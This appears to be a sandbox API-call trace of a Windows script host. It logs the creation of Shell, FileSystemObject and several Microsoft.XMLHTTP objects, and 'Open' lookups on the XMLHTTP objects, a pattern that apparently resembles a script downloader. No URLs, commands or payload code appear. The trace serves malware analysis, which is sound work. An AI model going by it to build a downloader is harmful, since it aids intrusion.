	[0433.559] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0433.560] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0433.560] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0433.560] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0433.560] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0433.560] ??2@YAPEAX_K@Z () returned 0x62f350
	[0433.560] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0433.560] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0433.560] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0433.560] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0433.560] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0433.560] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0433.560] SysStringLen (param_1=0x0) returned 0x0
	[0433.560] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0433.563] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0433.563] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0433.563] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0433.563] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0433.563] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0433.563] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0434.773] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0434.773] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0434.773] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0434.775] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0434.775] SysStringLen (param_1=0x0) returned 0x0
	[0434.775] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0434.775] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0434.775] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0434.775] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0434.775] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7c58) returned 0x0
	[0434.775] ??2@YAPEAX_K@Z () returned 0x62f330
	[0434.775] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7c58, pUnkSite=0x62f330) 
	[0434.775] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0434.775] XMLHTTPRequest:IUnknown:Release (This=0x49c7c58) returned 0x0
	[0434.775] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0434.776] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0434.776] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0434.776] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0434.778] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0434.778] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0434.779] SysStringLen (param_1=0x0) returned 0x0
	[0434.779] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0434.779] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0434.779] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7510) returned 0x0
	[0434.779] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0434.779] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7578) returned 0x0
	[0434.779] ??2@YAPEAX_K@Z () returned 0x62f310
	[0434.779] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7578, pUnkSite=0x62f310) 
	[0434.779] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0434.779] XMLHTTPRequest:IUnknown:Release (This=0x49c7578) returned 0x0
	[0434.779] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7510) returned 0x0
	[0434.779] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7510) returned 0x3
	[0434.779] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0434.779] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7510, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0434.780] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0434.780] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0434.780] SysStringLen (param_1=0x0) returned 0x0
	[0434.780] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0434.780] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0434.780] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b80) returned 0x0
	[0434.780] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0434.780] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7c58) returned 0x0
	[0434.780] ??2@YAPEAX_K@Z () returned 0x62f330
	[0434.780] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7c58, pUnkSite=0x62f330) 
	[0434.780] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0434.780] XMLHTTPRequest:IUnknown:Release (This=0x49c7c58) returned 0x0
	[0434.780] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b80) returned 0x0
	[0434.780] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b80) returned 0x3
	[0434.780] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0434.780] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b80, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0434.781] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0434.781] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0434.781] SysStringLen (param_1=0x0) returned 0x0
	[0434.781] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0434.781] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0434.781] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7490) returned 0x0
	[0434.781] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0434.781] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5be8) returned 0x0
	[0434.781] ??2@YAPEAX_K@Z () returned 0x62f310
	[0434.781] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5be8, pUnkSite=0x62f310) 
	[0434.781] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0434.781] XMLHTTPRequest:IUnknown:Release (This=0x49c5be8) returned 0x0
	[0434.781] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7490) returned 0x0
	[0434.781] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7490) returned 0x3
	[0434.781] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0434.781] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7490, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0434.782] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0434.782] longjmp () 
	[0434.782] longjmp () 
	[0434.782] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0434.782] SysStringLen (param_1=0x0) returned 0x0
	[0434.782] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0434.782] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0434.782] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74f0) returned 0x0
	[0434.782] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0434.782] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7558) returned 0x0
	[0434.782] ??2@YAPEAX_K@Z () returned 0x62f330
	[0434.782] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7558, pUnkSite=0x62f330) 
	[0434.782] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0434.782] XMLHTTPRequest:IUnknown:Release (This=0x49c7558) returned 0x0
	[0434.782] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74f0) returned 0x0
	[0434.782] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74f0) returned 0x3
	[0434.783] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0434.783] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
